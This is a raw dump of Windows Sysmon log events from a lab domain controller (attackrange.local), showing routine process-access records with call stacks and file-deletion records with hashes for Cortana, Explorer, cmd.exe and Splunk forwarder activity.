12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.954{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.875{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=BE579040B70DC2E59723B4D3C8B2892E,SHA256=DCE49E4ED1DF0AD1C47D97EB7EFA1FF4290A66E739605FA1C4AEBC4C3D74EA93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.875{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.860{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=16AE77ED18A5832431F1B06BF745D409,SHA256=E36F370C50813F581946A2D05E33FBF0574D279BC8D85D427A537A7686E00907,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:57.860{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000011139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:57.422{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0564ACC2251BBC061A6154098B0358CA,SHA256=439EAF70BEBB0B21AB0267D18FB48992E4995C9536E4C042F04DCA3FB575498B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.813{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.813{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.813{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 